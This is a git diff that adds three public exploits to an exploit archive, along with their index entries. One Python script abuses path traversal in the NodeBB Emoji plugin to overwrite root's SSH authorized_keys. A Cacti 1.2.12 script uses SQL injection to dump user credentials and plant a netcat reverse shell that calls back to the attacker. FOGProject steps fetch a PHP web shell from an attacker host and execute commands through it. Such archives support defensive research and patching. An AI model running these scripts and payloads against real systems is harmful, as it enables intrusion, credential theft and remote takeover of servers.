diff --git a/exploits/multiple/webapps/49813.py b/exploits/multiple/webapps/49813.py new file mode 100755 index 000000000..622e5650b --- /dev/null +++ b/exploits/multiple/webapps/49813.py @@ -0,0 +1,66 @@ +# Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write +# Date: 2021-02-01 +# Exploit Author: 1F98D +# Software Link: https://nodebb.org/ +# Version: Emoji for NodeBB <= v3.2.1 +# Tested on: Ubuntu 18.04 (x86) +# Software Link: https://github.com/NodeBB/nodebb-plugin-emoji +# +# The Emoji for NodeBB which is installed by default contains an +# arbitrary file write vulnerability to insecurely handled user controlled +# input. +# +# This exploit requires administrative access to the NodeBB instance in order +# to access the emoji upload API. +# +#!/usr/bin/python3 +import requests +import sys +import re +TARGET = 'http://192.168.1.1:4567' +USERNAME = 'admin' +PASSWORD = 'password' +DESTINATION_FILE = '/root/.ssh/authorized_keys' +SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub' +headers = { 'User-Agent': 'NotPython' } +s = requests.Session() +r = s.get('{}/login'.format(TARGET), headers=headers) +if r.status_code != 200: + print('[!] Error, {}/login unavailable'.format(TARGET)) + sys.exit(1) +csrf = re.search('name="_csrf" value="(.+)?" />', r.text, re.IGNORECASE) +if csrf is None: + print('[!] Could not extract csrf token to proceed.') + sys.exit(1) +auth = { + 'username': USERNAME, + 'password': PASSWORD, + '_csrf': csrf.group(1) +} +r = s.post('{}/login'.format(TARGET), headers=headers, data=auth) +if r.status_code != 200: + print('[!] Error, login failed') + print('[!] Status: {}'.format(r.status_code)) + print('[!] Response: {}'.format(r.text)) + sys.exit(1) +print('[+] Login successful') +r = s.get('{}/admin/plugins/emoji'.format(TARGET), headers=headers) +if r.status_code != 200: + print('[!] Error, could not access emoji plugin') + print('[!] Status: {}'.format(r.status_code)) + print('[!] Response: {}'.format(r.text)) + sys.exit(1) +print('[+] Emoji plugin is installed') +files = { + 'emojiImage': open(SOURCE_FILE) +} +data = { + 'fileName': '../../../../../../..{}'.format(DESTINATION_FILE) +} +r = s.post('{}/api/admin/plugins/emoji/upload'.format(TARGET), headers=headers, data=data, files=files) +if r.status_code != 200: + print('[!] Error, could not upload file') + print('[!] Status: {}'.format(r.status_code)) + print('[!] Response: {}'.format(r.text)) + sys.exit(1) +print('[+] Successfully uploaded file') \ No newline at end of file diff --git a/exploits/php/webapps/49810.py b/exploits/php/webapps/49810.py new file mode 100755 index 000000000..ce76bdcce --- /dev/null +++ b/exploits/php/webapps/49810.py @@ -0,0 +1,92 @@ +# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution +# Date: 04/28/2021 +# Exploit Author: Leonardo Paiva +# Vendor Homepage: https://www.cacti.net/ +# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz +# Version: 1.2.12 +# Tested on: Ubuntu 20.04 +# CVE : CVE-2020-14295 +# Credits: @M4yFly (https://twitter.com/M4yFly) +# References: +# https://github.commandcom/Cacti/cacti/issues/3622 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295 + +#!/usr/bin/python3 + +import argparse +import requests +import sys +import urllib.parse +from bs4 import BeautifulSoup + +# proxies = {'http': 'http://127.0.0.1:8080'} + + +def login(url, username, password, session): + print("[+] Connecting to the server...") + get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies) + + print("[+] Retrieving CSRF token...") + html_content = get_token_request.text + soup = BeautifulSoup(html_content, 'html.parser') + + csrf_token = soup.find_all('input')[0].get('value').split(';')[0] + + if csrf_token: + print(f"[+] Got CSRF token: {csrf_token}") + print("[+] Trying to log in...") + + data = { + '__csrf_magic': csrf_token, + 'action': 'login', + 'login_username': username, + 'login_password': password + } + + login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies) + if "Invalid User Name/Password Please Retype" in login_request.text: + print("[-] Unable to log in. Check your credentials") + sys.exit() + else: + print("[+] Successfully logged in!") + else: + print("[-] Unable to retrieve CSRF token!") + sys.exit() + + +def exploit(lhost, lport, session): + rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f") + payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-" + + exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies) + + print("\n[+] SQL Injection:") + print(exploit_request.text) + + try: + session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies) + except Exception: + pass + + print("[+] Check your nc listener!") + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution') + + parser.add_argument('-t', metavar='', help='target/host URL, example: http://192.168.15.58', required=True) + parser.add_argument('-u', metavar='', help='user to log in', required=True) + parser.add_argument('-p', metavar='', help="user's password", required=True) + parser.add_argument('--lhost', metavar='', help='your IP address', required=True) + parser.add_argument('--lport', metavar='', help='your listening port', required=True) + args = parser.parse_args() + + url = args.t + username = args.u + password = args.p + lhost = args.lhost + lport = args.lport + + session = requests.Session() + + login(url, username, password, session) + exploit(lhost, lport, session) \ No newline at end of file diff --git a/exploits/php/webapps/49811.txt b/exploits/php/webapps/49811.txt new file mode 100644 index 000000000..d78f8e168 --- /dev/null +++ b/exploits/php/webapps/49811.txt @@ -0,0 +1,31 @@ +# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated) +# Date: 2021-04-28 +# Exploit Author: sml@lacashita.com +# Vendor Homepage: https://fogproject.org +# Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip +# Tested on: Debian 10 + +On the Attacker Machine: + +1) Create an empty 10Mb file. +dd if=/dev/zero of=myshell bs=10485760 count=1 + +2) Add your PHP code to the end of the file created in the step 1. +echo '' >> myshell + +3) Put the file "myshell" accessible through HTTP. +$ cp myshell /var/www/html + +4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP). +$ echo "http://ATTACKER_IP/myshell" | base64 +aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo= + +5) Visit +http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file==&arch=arm64 +Example: +http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64 + +6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php +and click on Install. + +7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f3744a37f..e9e885dba 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43980,3 +43980,6 @@ id,file,description,date,author,type,platform,port 49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",2021-04-27,"Mohammed Aloraimi",webapps,php, 49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",2021-04-27,"Ahmad Shakla",webapps,php, 49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",2021-04-28,"Sreenath Raghunathan",webapps,php, +49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution",2021-04-29,"Leonardo Paiva",webapps,php, +49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php, +49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,